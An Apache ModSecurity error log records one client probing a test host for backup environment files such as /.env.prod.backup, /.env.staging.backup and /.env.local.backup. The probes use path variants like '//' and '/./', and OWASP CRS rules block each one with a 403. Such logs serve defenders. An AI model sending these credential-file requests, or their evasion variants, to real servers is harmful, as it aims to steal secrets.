[Fri Jan 16 03:21:36.418244 2026] [:error] [pid 1444031] [client 45.148.10.246:50102] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup/"] [unique_id "aWmgsH-9MmrgwjmYTAJT3wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.prod.backup/
[Fri Jan 16 03:21:36.418503 2026] [:error] [pid 1444031] [client 45.148.10.246:50102] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup/"] [unique_id "aWmgsH-9MmrgwjmYTAJT3wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.prod.backup/
[Fri Jan 16 03:21:36.418665 2026] [:error] [pid 1444031] [client 45.148.10.246:50102] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup/"] [unique_id "aWmgsH-9MmrgwjmYTAJT3wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.prod.backup/
[Fri Jan 16 03:21:36.549233 2026] [:error] [pid 1444035] [client 45.148.10.246:50108] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsLauW6yeGWXfDeFYhgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod.backup
[Fri Jan 16 03:21:36.549395 2026] [:error] [pid 1444035] [client 45.148.10.246:50108] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsLauW6yeGWXfDeFYhgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod.backup
[Fri Jan 16 03:21:36.549618 2026] [:error] [pid 1444035] [client 45.148.10.246:50108] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsLauW6yeGWXfDeFYhgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod.backup
[Fri Jan 16 03:21:36.549796 2026] [:error] [pid 1444035] [client 45.148.10.246:50108] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsLauW6yeGWXfDeFYhgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.prod.backup
[Fri Jan 16 03:21:36.686736 2026] [:error] [pid 1444034] [client 45.148.10.246:50116] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsORfEYyDES-ZFL4ixAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod.backup
[Fri Jan 16 03:21:36.686876 2026] [:error] [pid 1444034] [client 45.148.10.246:50116] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsORfEYyDES-ZFL4ixAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod.backup
[Fri Jan 16 03:21:36.687087 2026] [:error] [pid 1444034] [client 45.148.10.246:50116] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsORfEYyDES-ZFL4ixAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod.backup
[Fri Jan 16 03:21:36.687243 2026] [:error] [pid 1444034] [client 45.148.10.246:50116] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.backup"] [unique_id "aWmgsORfEYyDES-ZFL4ixAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.prod.backup
[Fri Jan 16 03:21:37.033765 2026] [:error] [pid 1444032] [client 45.148.10.246:50128] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup/"] [unique_id "aWmgsekMvq8uPO2ZciWrWwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.backup/
[Fri Jan 16 03:21:37.033995 2026] [:error] [pid 1444032] [client 45.148.10.246:50128] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup/"] [unique_id "aWmgsekMvq8uPO2ZciWrWwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.backup/
[Fri Jan 16 03:21:37.034154 2026] [:error] [pid 1444032] [client 45.148.10.246:50128] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup/"] [unique_id "aWmgsekMvq8uPO2ZciWrWwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.backup/
[Fri Jan 16 03:21:37.260474 2026] [:error] [pid 1444040] [client 45.148.10.246:50140] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsfn_5sIyKhJ5GAza7QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.backup
[Fri Jan 16 03:21:37.260622 2026] [:error] [pid 1444040] [client 45.148.10.246:50140] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsfn_5sIyKhJ5GAza7QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.backup
[Fri Jan 16 03:21:37.260860 2026] [:error] [pid 1444040] [client 45.148.10.246:50140] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsfn_5sIyKhJ5GAza7QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.backup
[Fri Jan 16 03:21:37.261042 2026] [:error] [pid 1444040] [client 45.148.10.246:50140] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsfn_5sIyKhJ5GAza7QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.backup
[Fri Jan 16 03:21:37.426614 2026] [:error] [pid 1444031] [client 45.148.10.246:50142] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsX-9MmrgwjmYTAJT4AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.backup
[Fri Jan 16 03:21:37.426761 2026] [:error] [pid 1444031] [client 45.148.10.246:50142] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsX-9MmrgwjmYTAJT4AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.backup
[Fri Jan 16 03:21:37.426976 2026] [:error] [pid 1444031] [client 45.148.10.246:50142] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsX-9MmrgwjmYTAJT4AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.backup
[Fri Jan 16 03:21:37.427168 2026] [:error] [pid 1444031] [client 45.148.10.246:50142] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.backup"] [unique_id "aWmgsX-9MmrgwjmYTAJT4AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.backup
[Fri Jan 16 03:21:37.566695 2026] [:error] [pid 1444035] [client 45.148.10.246:50158] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsbauW6yeGWXfDeFYhwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup
[Fri Jan 16 03:21:37.566851 2026] [:error] [pid 1444035] [client 45.148.10.246:50158] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsbauW6yeGWXfDeFYhwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup
[Fri Jan 16 03:21:37.567075 2026] [:error] [pid 1444035] [client 45.148.10.246:50158] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsbauW6yeGWXfDeFYhwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup
[Fri Jan 16 03:21:37.567240 2026] [:error] [pid 1444035] [client 45.148.10.246:50158] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsbauW6yeGWXfDeFYhwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup
[Fri Jan 16 03:21:37.781340 2026] [:error] [pid 1444033] [client 45.148.10.246:50168] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup/"] [unique_id "aWmgsdLJkp65ULFQ2YYjNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup/
[Fri Jan 16 03:21:37.781579 2026] [:error] [pid 1444033] [client 45.148.10.246:50168] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup/"] [unique_id "aWmgsdLJkp65ULFQ2YYjNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup/
[Fri Jan 16 03:21:37.781763 2026] [:error] [pid 1444033] [client 45.148.10.246:50168] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup/"] [unique_id "aWmgsdLJkp65ULFQ2YYjNQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.backup/
[Fri Jan 16 03:21:37.949195 2026] [:error] [pid 1444034] [client 45.148.10.246:50170] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgseRfEYyDES-ZFL4ixQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.backup
[Fri Jan 16 03:21:37.949342 2026] [:error] [pid 1444034] [client 45.148.10.246:50170] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgseRfEYyDES-ZFL4ixQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.backup
[Fri Jan 16 03:21:37.949566 2026] [:error] [pid 1444034] [client 45.148.10.246:50170] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgseRfEYyDES-ZFL4ixQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.backup
